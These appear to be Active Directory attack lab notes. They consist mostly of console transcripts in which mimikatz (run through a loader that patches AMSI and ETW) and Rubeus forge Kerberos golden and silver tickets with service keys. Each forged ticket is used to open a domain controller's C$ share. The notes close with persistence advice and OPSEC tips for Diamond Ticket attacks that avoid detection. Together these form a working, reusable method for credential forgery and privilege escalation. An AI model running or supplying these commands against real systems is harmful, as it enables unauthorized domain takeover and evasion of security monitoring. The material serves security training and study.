C:\Windows\system32>C:\Ad\Tools\Loader.exe -Path C:\Ad\Tools\Old_Tools\BetterSafetyKatz.exe "kerberos::golden /User:administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /aes256:e4a24a0b2f58786711c6f8a983bf5a1e00eaf160fcdc2b4225825711b99cf5af /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : C:\Ad\Tools\Old_Tools\BetterSafetyKatz.exe Arguments :
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\Ad\Tools\Old_Tools\BetterSafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\Ad\Tools\Old_Tools\BetterSafetyKatz.exe" command of "standard"
module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # kerberos::golden /User:administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /aes256:e4a24a0b2f58786711c6f8a983bf5a1e00eaf160fcdc2b4225825711b99cf5af /startoffset:0 /endin:600 /renewmax:10080 /ptt
User : administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: e4a24a0b2f58786711c6f8a983bf5a1e00eaf160fcdc2b4225825711b99cf5af - aes256_hmac
Service : CIFS
Target : dcorp-dc.dollarcorp.moneycorp.local
Lifetime : 6/28/2024 7:31:58 AM ; 6/28/2024 5:31:58 PM ; 7/5/2024 7:31:58 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'administrator @ dollarcorp.moneycorp.local' successfully submitted for current session

mimikatz(commandline) # exit
Bye!
C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$\
Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\C$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\dcorp-dc.dollarcorp.moneycorp.local\C$

05/08/2021 01:20 AM <DIR> PerfLogs


11/14/2022 11:12 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
05/18/2024 01:32 AM <DIR> Users
01/10/2024 01:59 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 6,415,802,368 bytes free

NTLM Hash
BetterSafetyKatz.exe "kerberos::golden /User:<user to impersonate> /domain:<Domain> /sid:<Domain
SID> /target:<target machine containing the service> /service:<service> /rc4:<hash of the service
account> /startoffset:0 /endin:<Ticketlifetime> /renewmax:<Renewaltime> /ptt" "exit"

C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$\
Access is denied.

C:\Windows\system32>C:\Ad\Tools\Loader.exe -Path C:\Ad\Tools\Old_Tools\BetterSafetyKatz.exe "kerberos::golden /User:administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:81a9ccc2f44b988af78448ad78297ad5 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : C:\Ad\Tools\Old_Tools\BetterSafetyKatz.exe Arguments :
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\Ad\Tools\Old_Tools\BetterSafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\Ad\Tools\Old_Tools\BetterSafetyKatz.exe" command of "standard"
module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # kerberos::golden /User:administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:81a9ccc2f44b988af78448ad78297ad5 /startoffset:0 /endin:600 /renewmax:10080 /ptt
User : administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-719815819-3726368948-3917688648
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 81a9ccc2f44b988af78448ad78297ad5 - rc4_hmac_nt
Service : CIFS
Target : dcorp-dc.dollarcorp.moneycorp.local
Lifetime : 6/28/2024 7:53:39 AM ; 6/28/2024 5:53:39 PM ; 7/5/2024 7:53:39 AM
-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'administrator @ dollarcorp.moneycorp.local' successfully submitted for current session

mimikatz(commandline) # exit
Bye!

C:\Windows\system32>klist

Current LogonId is 0:0x4bc7e9

Cached Tickets: (1)

#0> Client: administrator @ dollarcorp.moneycorp.local


Server: CIFS/dcorp-dc.dollarcorp.moneycorp.local @ dollarcorp.moneycorp.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 6/28/2024 7:53:39 (local)
End Time: 6/28/2024 17:53:39 (local)
Renew Time: 7/5/2024 7:53:39 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:

C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$\
Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\C$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\dcorp-dc.dollarcorp.moneycorp.local\C$

05/08/2021 01:20 AM <DIR> PerfLogs


11/14/2022 11:12 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
05/18/2024 01:32 AM <DIR> Users
01/10/2024 01:59 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 6,414,053,376 bytes free
Using Rubeus
AES Hash
Rubeus.exe silver /service:<service>/<Hostname> /aes256:<aes keys> /sid:<DomainSID> /ldap /user:<User to Impersonate> /domain:<Domain> /ptt

C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$
Access is denied.

C:\Windows\system32>C:\AD\Tools\Rubeus.exe silver /service:CIFS/dcorp-dc.dollarcorp.moneycorp.local /aes256:e4a24a0b2f58786711c6f8a983bf5a1e00eaf160fcdc2b4225825711b99cf5af /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Build TGS

[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group
Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain
Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Built
in,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-
513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[*] \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL successfully mounted
[*] Attempting to unmount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[*] \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL successfully unmounted
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[*] \\us.dollarcorp.moneycorp.local\SYSVOL successfully mounted
[*] Attempting to unmount: \\us.dollarcorp.moneycorp.local\SYSVOL
[*] \\us.dollarcorp.moneycorp.local\SYSVOL successfully unmounted
[*] Retrieving netbios name information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for
'(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group
Policy Creator
Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain
Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN
=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-
1806204659-513))'
[*] Retrieving netbios name information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for
'(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC

[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)


[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ServiceKey : E4A24A0B2F58786711C6F8A983BF5A1E00EAF160FCDC2B4225825711B99CF5AF
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : E4A24A0B2F58786711C6F8A983BF5A1E00EAF160FCDC2B4225825711B99CF5AF
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : CIFS
[*] Target : dcorp-dc.dollarcorp.moneycorp.local

[*] Generating EncTicketPart


[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'CIFS/dcorp-dc.dollarcorp.moneycorp.local'

[*] AuthTime : 6/28/2024 8:53:15 AM


[*] StartTime : 6/28/2024 8:53:15 AM
[*] EndTime : 6/28/2024 6:53:15 PM
[*] RenewTill : 7/5/2024 8:53:15 AM

[*] base64(ticket.kirbi):

doIGKjCCBiagAwIBBaEDAgEWooIE3TCCBNlhggTVMIIE0aADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlD
T1JQLkxPQ0FMojYwNKADAgECoS0wKxsEQ0lGUxsjZGNvcnAtZGMuZG9sbGFyY29ycC5tb25leWNvcnAu
bG9jYWyjggRyMIIEbqADAgESoQMCAQOiggRgBIIEXExJ5+lcK8sdaG1M8b7FT48dBLgHeWzlOofBjba+
tCON+9O6MrAgSswSDMAVIfzwDhle3GgxuorFrpbyNeVuHMD8sST7GnEb6jeCEUtaR+sBBnWUG9Q7eF20
FacPhrYDTnP+emTHLyyFRuKnjTSKy+bhciA1Lcs+7wnoGUrIRyJahNGqHh3iKRz6DF3+UpSA3KL6XsfR
m/CQMt0wqDec9+FvwFR65ipFHBoQoekJptiBwLN1FiGOyccCRUcyWLeqC5Gjmn1aFCa63Kbom4FygUza
YqgRx6EBex6QLGbjyi++eVvutvia6UAbZT693QDxR4CT/Y0fkxQqV6apfxQnhP3pCWDJw5vuAu0ow3e3
uEwPwT3xOfB7hzdcZ4ROVA5N91o/0wSHHGSvwiRil3M1f4Mf1P6OXkwiOxTE+nwdh42A+hwbAEuWGRJO
Dd4SGekE1xn6rQr6QXSPxu0QsVWqxPIVePq0lU6kAyrqlzJa5Vc2lW9xsfHYnCoey+iXOOjKWDGwVOKO
gmV1EcrqdSLt2BDMApfa0wUn185d0NGn7kkuu4PJ3Uvl6OdaBhDwkR2aWrFMGFJflvNKoyoD/RRCQ1Fq
2e+Pr4iL+2DS9pwd63pWL8zET1usZihKEVAAsGq3v85X0Es8nIHhjS7cs+ZoPR/3Qv6ekcVBX7T4CDlb
VdCiiWxGBvIzAANKqPOEdsweC7YQD9S/MLOtkTDU0HLCm/t8qIczEEe3QfDpDsNjVHHu8/bSJmqkB03D
M4tfnv7T0z1QUQzC2NP+oCvNXr/MYmdg/zsvDe7BsDNtx//fuiBSokywvudywtMQAG5wG5OLeeMLu+uE
oj6o6aLCGBDB86f5xnBbATr04hE/5D0woVSyTMNDJTVaztX7NJLHsTOujF5okuohBeX6RZ4jAvxjXqDI
wdNDOS/IzK48i1WxKdxDkux8ZILsIhpN77R75SoqKz2o0+zPFbXw1D77XzKfdQBHJEqqY3l5A2vejA21
/vkdNwtPdLNa9tsf/Jm6sRUDKCn1bB8fr4O0yeZSVBJD0cLN5+nALBOD1abz2qPSen65CjensaRPgbRJ
B8TutLJC6ri4eLa2ILvUY3C/ErMioDB3/EDYLoZtMF2sMc8Df5gAqPpORaPr82VYfSC1EpYJnHgOMXmt
K2FmAeOUOIXBle+dl57jQ13ZFD2CPiOZ6+iFVh/KVVXc0VhXbYghYxXdPszhdHEsN7x7vBSqO2MmLLt0
Cz+S53aSeyzf87KDFNLnONzqOekqxEh/kdPEHsVCkkjW/6PRxj+G6nqVWfvd1cmlBSkg7ESqDBTWewZv
lYv0hrdUG1L5vHSnu/YC/hNpKYJ5UkljMow/F3WfQ9RghOHg+KQLqB16xMxExi+BolZtzPv8vJ6OG4LK
ksKzJHXD4Etv3B61HdohZtCbpphVjU//JPIv18HaHl82rPpGCBjI/Oeh4ykZPEKpEY2oMIanslSAF6hG
xX69YoQGs6OCATcwggEzoAMCAQCiggEqBIIBJn2CASIwggEeoIIBGjCCARYwggESoCswKaADAgESoSIE
IMtjjdscE2NVjCMqc6tT3F2ZYvfmbqV/JAfuGdqJuQOXoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxP
Q0FMohowGKADAgEBoREwDxsNQWRtaW5pc3RyYXRvcqMHAwUAQKAAAKQRGA8yMDI0MDYyODE1NTMxNVql
ERgPMjAyNDA2MjgxNTUzMTVaphEYDzIwMjQwNjI5MDE1MzE1WqcRGA8yMDI0MDcwNTE1NTMxNVqoHBsa
RE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypNjA0oAMCAQKhLTArGwRDSUZTGyNkY29ycC1kYy5kb2xs
YXJjb3JwLm1vbmV5Y29ycC5sb2NhbA==

[+] Ticket successfully imported!

C:\Windows\system32>klist

Current LogonId is 0:0x56c861

Cached Tickets: (1)

#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL


Server: CIFS/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 6/28/2024 8:53:15 (local)
End Time: 6/28/2024 18:53:15 (local)
Renew Time: 7/5/2024 8:53:15 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$
Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\C$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\dcorp-dc.dollarcorp.moneycorp.local\C$

05/08/2021 01:20 AM <DIR> PerfLogs


11/14/2022 11:12 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
05/18/2024 01:32 AM <DIR> Users
01/10/2024 01:59 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 6,394,613,760 bytes free

Using the NTLM hash (the RC4 key) of the service account instead of its AES256 key:
Rubeus.exe silver /service:<service>/<Hostname> /rc4:<NTLM Hash> /sid:<DomainSID> /ldap
/user:<User to Impersonate> /domain:<Domain> /ptt
C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$
Access is denied.
C:\Windows\system32>C:\AD\Tools\Rubeus.exe silver /service:CIFS/dcorp-
dc.dollarcorp.moneycorp.local /rc4:81a9ccc2f44b988af78448ad78297ad5 /sid:S-1-5-21-719815819-
3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: Build TGS

[*] Trying to query LDAP using LDAPS for user information on domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(samaccountname=Administrator)'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group
Policy Creator Owners,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain
Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN=Built
in,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-719815819-3726368948-3917688648-
513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED
(5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and
PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and
PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for
'(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Retrieving group and domain policy information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'DC=dollarcorp,DC=moneycorp,DC=local' for '(|(distinguishedname=CN=Group
Policy Creator
Owners,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Domain
Admins,CN=Users,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(distinguishedname=CN=Administrators,CN
=Builtin,DC=us,DC=dollarcorp,DC=moneycorp,DC=local)(objectsid=S-1-5-21-1028785420-4100948154-
1806204659-513)(name={31B2F340-016D-11D2-945F-00C04FB984F9}))'
[*] Attempting to mount: \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\dcorp-dc.dollarcorp.moneycorp.local\SYSVOL error code ERROR_ACCESS_DENIED
(5)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and
PasswordMustChange PAC fields.
[*] Attempting to mount: \\us.dollarcorp.moneycorp.local\SYSVOL
[X] Error mounting \\us.dollarcorp.moneycorp.local\SYSVOL error code ERROR_BAD_NET_NAME (67)
[!] Warning: Unable to get domain policy information, skipping PasswordCanChange and
PasswordMustChange PAC fields.
[*] Retrieving netbios name information over LDAP from domain controller dcorp-
dc.dollarcorp.moneycorp.local
[*] Searching path 'CN=Configuration,DC=moneycorp,DC=local' for
'(&(netbiosname=*)(dnsroot=dollarcorp.moneycorp.local))'
[*] Building PAC

[*] Domain : DOLLARCORP.MONEYCORP.LOCAL (dcorp)


[*] SID : S-1-5-21-719815819-3726368948-3917688648
[*] UserId : 500
[*] Groups : 544,512,520,513
[*] ServiceKey : 81A9CCC2F44B988AF78448AD78297AD5
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_MD5
[*] KDCKey : 81A9CCC2F44B988AF78448AD78297AD5
[*] KDCKeyType : KERB_CHECKSUM_HMAC_MD5
[*] Service : CIFS
[*] Target : dcorp-dc.dollarcorp.moneycorp.local

[*] Generating EncTicketPart


[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGS for 'Administrator' to 'CIFS/dcorp-dc.dollarcorp.moneycorp.local'

[*] AuthTime : 6/28/2024 8:57:34 AM


[*] StartTime : 6/28/2024 8:57:34 AM
[*] EndTime : 6/28/2024 6:57:34 PM
[*] RenewTill : 7/5/2024 8:57:34 AM

[*] base64(ticket.kirbi):

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
cnAubW9uZXljb3JwLmxvY2Fs

[+] Ticket successfully imported!


C:\Windows\system32>klist

Current LogonId is 0:0x5b2707

Cached Tickets: (1)

#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL


Server: CIFS/dcorp-dc.dollarcorp.moneycorp.local @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 6/28/2024 8:57:34 (local)
End Time: 6/28/2024 18:57:34 (local)
Renew Time: 7/5/2024 8:57:34 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:

C:\Windows\system32>dir \\dcorp-dc.dollarcorp.moneycorp.local\C$\
Volume in drive \\dcorp-dc.dollarcorp.moneycorp.local\C$ has no label.
Volume Serial Number is 1A5A-FDE2

Directory of \\dcorp-dc.dollarcorp.moneycorp.local\C$

05/08/2021 01:20 AM <DIR> PerfLogs


11/14/2022 11:12 PM <DIR> Program Files
05/08/2021 02:40 AM <DIR> Program Files (x86)
05/18/2024 01:32 AM <DIR> Users
01/10/2024 01:59 AM <DIR> Windows
0 File(s) 0 bytes
5 Dir(s) 6,394,249,216 bytes free

Service Type            Service(s) to be used in a silver ticket
Scheduling tasks        HOST
File System             CIFS
WMI                     HOST + RPCSS
WinRM                   HOST, HTTP
PowerShell Remoting     HOST, HTTP, RPCSS

Where more than one service is listed, forge and import one ticket per service class (for example a HOST
ticket and an RPCSS ticket for WMI).

Persistence
The forged ticket stays usable, and new ones can be forged, for as long as the service account's
password (and therefore its Kerberos key) is unchanged. By default, machine account passwords are
rotated every 30 days, so a Silver Ticket gives far shorter persistence than a Golden Ticket, whose
lifetime is tied to the rarely changed krbtgt password.

Diamond Ticket Attack


A Diamond Ticket is created by requesting a valid TGT from the DC, decrypting it with the krbtgt
account's AES key, changing its contents (typically the PAC: user name, RID and group membership), and
re-encrypting it with the same krbtgt key.

A Golden Ticket is a TGT forging attack, whereas a Diamond Ticket is a TGT modification attack.

As with a Golden Ticket, persistence depends on the krbtgt account's key.

A Diamond Ticket is more OPSEC-safe than a Golden Ticket because:

• Its ticket times are valid, since a TGT issued by the DC is what gets modified rather than values the
attacker makes up.

• A TGT request (event 4768) exists on the DC for it. With a Golden Ticket there is no corresponding TGT
request for the TGS/service ticket requests, because the TGT was forged. Note that the logged request
is for the account the TGT was originally issued to (with /tgtdeleg, the current user), not for the
impersonated user.

Execution
